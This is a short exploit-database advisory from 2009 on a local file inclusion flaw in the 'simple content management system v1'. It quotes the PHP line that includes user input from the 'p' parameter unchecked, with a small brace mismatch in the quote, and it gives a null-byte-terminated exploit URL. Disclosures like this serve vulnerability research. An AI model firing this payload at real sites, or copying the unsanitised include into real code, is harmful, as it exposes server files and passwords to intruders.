id: 4700
date: 01/18/2009
title: SCMS v1 (index.php p) Local File Inclusion Vulnerability
author: ahmadbady
cves: 

========================================================
SCMS v1 (index.php p) Local File Inclusion Vulnerability
========================================================


                           --:local file include:--
---------------------------------  
script:simple content management system v 1
   
-------------------------------------------------------
download from:http://futurekast.com/fcms/php/SCMSv1.zip
   
-------------------------------------------------------

...............................................
vul:/index.php line 34:

<?php 
 if (!isset($_GET['p']))
  include("../SCMSv1/includes/default.txt");
 } else include("includes/" . $_GET['p'] . ".txt");
 ?>
-------------------------------------------
-------------------------------------------
xpl:

http://127.0.0.1/path/index.php?p=[Lfi]%00

***************************************************
***************************************************
---------------------------------------------------




#  0day.today [2023-03-22]  #